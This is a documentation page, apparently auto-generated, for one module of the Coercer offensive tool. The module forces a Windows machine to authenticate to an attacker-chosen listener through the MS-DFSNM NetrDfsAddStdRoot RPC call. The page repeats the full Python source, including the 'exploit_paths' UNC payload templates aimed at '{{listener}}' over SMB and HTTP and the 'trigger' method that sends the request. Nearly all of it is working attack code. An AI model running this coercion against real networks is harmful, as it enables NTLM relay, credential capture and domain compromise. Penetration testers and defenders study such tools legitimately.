coercer.methods.MS_DFSNM.NetrDfsAddStdRoot

 1#!/usr/bin/env python3
 2# -*- coding: utf-8 -*-
 3# File name          : NetrDfsAddStdRoot.py
 4# Author             : Podalirius (@podalirius_)
 5# Date created       : 14 Sep 2022
 6
 7from coercer.core.utils import gen_random_name
 8from coercer.models.MSPROTOCOLRPCCALL import MSPROTOCOLRPCCALL
 9from coercer.network.DCERPCSessionError import DCERPCSessionError
10from impacket.dcerpc.v5.ndr import NDRCALL, NDRSTRUCT
11from impacket.dcerpc.v5.dtypes import UUID, ULONG, WSTR, DWORD, LONG, NULL, BOOL, UCHAR, PCHAR, RPC_SID, LPWSTR, GUID
12
13
14class _NetrDfsAddStdRoot(NDRCALL):
15    """
16    Structure to make the RPC call to NetrDfsAddStdRoot() in MS-DFSNM Protocol
17    """
18    opnum = 12
19    structure = (
20        ('ServerName', WSTR),  # Type: WCHAR *
21        ('RootShare', WSTR),   # Type: WCHAR *
22        ('Comment', WSTR),     # Type: WCHAR *
23        ('ApiFlags', DWORD),   # Type: DWORD
24    )
25
26
27class _NetrDfsAddStdRootResponse(NDRCALL):
28    """
29    Structure to parse the response of the RPC call to NetrDfsAddStdRoot() in MS-DFSNM Protocol
30    """
31    structure = ()
32
33
34class NetrDfsAddStdRoot(MSPROTOCOLRPCCALL):
35    """
36    Coercing a machine to authenticate using function NetrDfsAddStdRoot (opnum 12) of [MS-DFSNM]: Distributed File System (DFS): Namespace Management Protocol (https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-dfsnm/95a506a8-cae6-4c42-b19d-9c1ed1223979)
37
38    Method found by:
39     - [@filip_dragovic](https://twitter.com/filip_dragovic)
40    """
41
42    exploit_paths = [
43        ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\file.txt\x00'),
44        ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\\x00'),
45        ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\x00'),
46        ("http", '\\\\{{listener}}{{http_listen_port}}/{{rnd(3)}}\\file.txt\x00'),
47    ]
48
49    access = {
50        "ncan_np": [
51            {
52                "namedpipe": r"\PIPE\netdfs",
53                "uuid": "4fc742e0-4a10-11cf-8273-00aa004ae673",
54                "version": "3.0"
55            }
56        ],
57        "ncacn_ip_tcp": [
58            {
59                "uuid": "4fc742e0-4a10-11cf-8273-00aa004ae673",
60                "version": "3.0"
61            }
62        ]
63    }
64
65    protocol = {
66        "longname": "[MS-DFSNM]: Distributed File System (DFS): Namespace Management Protocol",
67        "shortname": "MS-DFSNM"
68    }
69
70    function = {
71        "name": "NetrDfsAddStdRoot",
72        "opnum": 12,
73        "vulnerable_arguments": ["ServerName"]
74    }
75
76    def trigger(self, dcerpc_session, target):
77        if dcerpc_session is not None:
78            try:
79                request = _NetrDfsAddStdRoot()
80                request['ServerName'] = self.path
81                request['RootShare'] = gen_random_name() + '\x00'
82                request['Comment'] = gen_random_name() + '\x00'
83                request['ApiFlags'] = 0
84                resp = dcerpc_session.request(request)
85                return ""
86            except Exception as err:
87                return err
88        else:
89            print("[!] Error: dce is None, you must call connect() first.")
90            return None
class NetrDfsAddStdRoot(coercer.models.MSPROTOCOLRPCCALL.MSPROTOCOLRPCCALL):
35class NetrDfsAddStdRoot(MSPROTOCOLRPCCALL):
36    """
37    Coercing a machine to authenticate using function NetrDfsAddStdRoot (opnum 12) of [MS-DFSNM]: Distributed File System (DFS): Namespace Management Protocol (https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-dfsnm/95a506a8-cae6-4c42-b19d-9c1ed1223979)
38
39    Method found by:
40     - [@filip_dragovic](https://twitter.com/filip_dragovic)
41    """
42
43    exploit_paths = [
44        ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\file.txt\x00'),
45        ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\\x00'),
46        ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\x00'),
47        ("http", '\\\\{{listener}}{{http_listen_port}}/{{rnd(3)}}\\file.txt\x00'),
48    ]
49
50    access = {
51        "ncan_np": [
52            {
53                "namedpipe": r"\PIPE\netdfs",
54                "uuid": "4fc742e0-4a10-11cf-8273-00aa004ae673",
55                "version": "3.0"
56            }
57        ],
58        "ncacn_ip_tcp": [
59            {
60                "uuid": "4fc742e0-4a10-11cf-8273-00aa004ae673",
61                "version": "3.0"
62            }
63        ]
64    }
65
66    protocol = {
67        "longname": "[MS-DFSNM]: Distributed File System (DFS): Namespace Management Protocol",
68        "shortname": "MS-DFSNM"
69    }
70
71    function = {
72        "name": "NetrDfsAddStdRoot",
73        "opnum": 12,
74        "vulnerable_arguments": ["ServerName"]
75    }
76
77    def trigger(self, dcerpc_session, target):
78        if dcerpc_session is not None:
79            try:
80                request = _NetrDfsAddStdRoot()
81                request['ServerName'] = self.path
82                request['RootShare'] = gen_random_name() + '\x00'
83                request['Comment'] = gen_random_name() + '\x00'
84                request['ApiFlags'] = 0
85                resp = dcerpc_session.request(request)
86                return ""
87            except Exception as err:
88                return err
89        else:
90            print("[!] Error: dce is None, you must call connect() first.")
91            return None

Coercing a machine to authenticate using function NetrDfsAddStdRoot (opnum 12) of [MS-DFSNM]: Distributed File System (DFS): Namespace Management Protocol (https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-dfsnm/95a506a8-cae6-4c42-b19d-9c1ed1223979)

Method found by:

exploit_paths = [('smb', '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\file.txt\x00'), ('smb', '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\\x00'), ('smb', '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\x00'), ('http', '\\\\{{listener}}{{http_listen_port}}/{{rnd(3)}}\\file.txt\x00')]
access = {'ncan_np': [{'namedpipe': '\\PIPE\\netdfs', 'uuid': '4fc742e0-4a10-11cf-8273-00aa004ae673', 'version': '3.0'}], 'ncacn_ip_tcp': [{'uuid': '4fc742e0-4a10-11cf-8273-00aa004ae673', 'version': '3.0'}]}
protocol = {'longname': '[MS-DFSNM]: Distributed File System (DFS): Namespace Management Protocol', 'shortname': 'MS-DFSNM'}
function = {'name': 'NetrDfsAddStdRoot', 'opnum': 12, 'vulnerable_arguments': ['ServerName']}
def trigger(self, dcerpc_session, target):
77    def trigger(self, dcerpc_session, target):
78        if dcerpc_session is not None:
79            try:
80                request = _NetrDfsAddStdRoot()
81                request['ServerName'] = self.path
82                request['RootShare'] = gen_random_name() + '\x00'
83                request['Comment'] = gen_random_name() + '\x00'
84                request['ApiFlags'] = 0
85                resp = dcerpc_session.request(request)
86                return ""
87            except Exception as err:
88                return err
89        else:
90            print("[!] Error: dce is None, you must call connect() first.")
91            return None